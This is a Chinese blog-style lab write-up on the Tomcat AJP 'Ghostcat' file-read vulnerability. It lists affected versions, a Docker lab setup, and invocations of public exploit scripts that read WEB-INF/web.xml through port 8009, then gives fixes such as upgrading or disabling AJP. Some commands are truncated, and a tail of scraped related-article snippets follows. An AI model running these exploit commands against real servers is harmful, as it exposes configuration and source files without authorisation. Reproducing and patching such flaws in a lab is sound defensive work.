漏洞介绍

Tomcat在 server.xml中配置了两种连接器:HTTP Connector:监听8080端口,负责建立HTTP连接。在通过浏览器访问Tomcat服务器的Web应用时,使用的就是这个连接器。

AJP Connector:监听8009端口,负责和其他的HTTP服务器建立连接,通过AJP协议和另一个Web容器进行交互。

Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。而Tomcat服务器8009端口上的AJP协议存在漏洞,攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等

影响版本Apache Tomcat 6

Apache Tomcat 7 < 7.0.100

Apache Tomcat 8 < 8.5.51

Apache Tomcat 9 < 9.0.31

漏洞复现

靶场搭建这里使用Docker部署环境。搜索受影响版本的Tomcat的镜像,这里选择 Tomcat-8.5.32$ docker search tomcat-8.5

$ docker pull duonghuuphuc/tomcat-8.5.32

拉取完成后运行,并通过浏览器访问 http://:8080$ docker run -d -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.32Nmap扫描$ nmap

AjpShooter$ python ajpShooter.py http:// 8080 WEB-INF/web.xml read

Ghostcat$ python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 -f WEB-INF/web.xml

AJPy$ python tomcat.py --port version # 版本探测

$ python tomcat.py read_file --webapp=manager /WEB-INF/web.xml # 文件读取

修复建议更新Tomcat到安全版本Apache Tomcat 7.0.100

Apache Tomcat 8.5.51

Apache Tomcat 9.0.31

关闭AJP:编辑 Tomcat 配置文件 conf/server.xml,找到如下行并将其注释,然后保存配置文件并重新启动Tomcat

其它

修改服务器的AJP监听地址,实习记录(五) - AJP协议文件读取漏洞相关推荐

  1. 修改服务器的AJP监听地址,修改服务器的AJP监听地址

    修改服务器的AJP监听地址 内容精选 换一换 如果IP经过NAT/WAF,则只能获取到NAT/WAF转化后的IP地址,无法获取到NAT/WAF前的IP地址.如果客户端为容器,只能获取到容器所在主机的I ...

  2. ubuntu服务器上,求生之路2服务器如何把监听地址改为0.0.0.0

    今天准备尝试用rcon密码连接控制台的时候,出现了问题,由于游戏监听地址是127.0.1.1,导致无法远程连接,今天自己摸索了下解决了问题. 方法一:由于求生之路2服务器不属于内部自带的服务器,因此网 ...

  3. Tomcat AJP协议文件读取漏洞

    漏洞描述: Tomcat在 server.xml中配置了两种连接器: 1.HTTP Connector:监听8080端口,负责建立HTTP连接.在通过浏览器访问Tomcat服务器的Web应用时,使用的 ...

  4. linux修改端口监听地址,修改nginx/Tomcat等Web服务的端口监听地址

    我们将一起来学习如何在Linux实例中修改nginx.Tomcat等常见Web服务的端口监听地址. 前提条件 你已经在Linux实例上安装了Web服务器.你可以参考以下文档安装并启动相应的服务: 你已 ...

  5. 前端匹配服务器地址修改文件,修改服务器的监听地址

    修改服务器的监听地址 内容精选 换一换 Atlas 200 DK开发者板支持通过USB接口或者网线与Mind Studio进行连接,连接示例图如图1所示.Ubuntu服务器若想与Atlas 200 D ...

  6. linux oracle开启监听服务器,linux服务器启动oracle监听端口

    oracle监听 原理 客户端向服务器端发送连接请求,监听器监听到客户端德连接请求 监听器监听到客户端德连接请求后,把客户端德连接请求交给数据库服务器处理 客户端和服务器端建立连接,连接建立后,服务器 ...

  7. 解决服务器80端口监听异常导致无法打开和访问网站的问题

    转载:原文章地址:解决服务器80端口监听异常导致无法打开和访问网站的问题 - 爱码网 如果遇到IIS服务器的网站无法访问,并在IE/EDGE浏览器中显示无法显示此页的问题,一般情况下是有多种可能因素, ...

  8. windows mysql 监听地址_MYSQL地址监听问题

    你的位置: 问答吧 -> 服务器 -> 问题详情 MYSQL地址监听问题 RedHat 9 系统 在论坛里找了很久发现通过改/etc/init.d/mysqld这个文件里的 $bindir ...

  9. oracle 添加监听地址,oracle批改监听地址为localhost

    oracle修改监听地址为localhost 修改listener.ora,在11.1.0\db_1\NETWORK\ADMIN # listener.ora Network Configuratio ...

最新文章

  1. rust 关于ARM 板卡的使用
  2. php 编译安装 png.h,PHP编译安装时常见错误解决办法【大全】
  3. 如何实现网络负荷分担
  4. 3-18函数——作用域的查找空间
  5. documentbodyscrollTop的值总为零的解决办法
  6. 沈抚示范区·“华为云杯”2021全国AI大赛圆满落幕
  7. 淄博神爱计算机官网,【最美教师】张萍:大爱无言 育人无声
  8. STM8学习笔记---串口通信中如何自己定义通信协议
  9. PHP之wampserver修改根目录与默认页面
  10. OpenCV:利用python来实现图像的直方图均衡化
  11. C++ map, 运用map统计单词出现的次数
  12. 交换机的源地址学习机制和帧转发方式习题
  13. html打字练习测试代码,JS实现简单打字测试
  14. [培训-无线通信基础-6]:信道编码(分组码、卷积吗、Polar码、LDPC码、Turbo码)
  15. faster rcnn 计算mAP
  16. 【必备知识】线激光扫描三维成像原理
  17. mac用navicat连接mysql_Mac OS下,使用Navicat连接MySQL出现的问题
  18. 使用Python根据视频链接下载MP4视频
  19. 电源防反接电路 供电自动切换电路 - MOS管体二极管的应用
  20. 机器人论文(1)-下肢外骨骼的平衡与稳定性问题:系统综述

热门文章

  1. 数据源中没有 datarow_Power BI Desktop 中的数据源
  2. python有趣小程序-小码王分享python一些有趣的小程序
  3. python新手入门代码-Python的初学者你现在可以自己quot;看”到代码的运行了!
  4. python 在线培训费用-python培训费需要多少钱?
  5. python和java学哪个好-学python还是java python和java哪个好入门
  6. python安装后如何使用-python如何安装下载后的模块
  7. python编程入门必备知识-python基础教程#菜鸟也能看懂的超简单入门必备知识
  8. 云原生游戏《云联物语》揭开神秘面纱 云鹭科技温向东带你深度了解云原生游戏领域...
  9. css 文字超出隐藏显示省略号
  10. python计算空类型_python的变量 类型和存储